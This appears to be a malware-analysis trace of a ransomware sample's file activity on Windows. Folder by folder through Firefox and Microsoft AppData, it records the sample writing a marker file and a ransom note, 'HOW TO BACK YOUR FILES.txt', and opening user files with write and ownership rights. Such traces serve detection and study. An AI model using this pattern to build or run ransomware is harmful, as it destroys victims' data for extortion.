Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
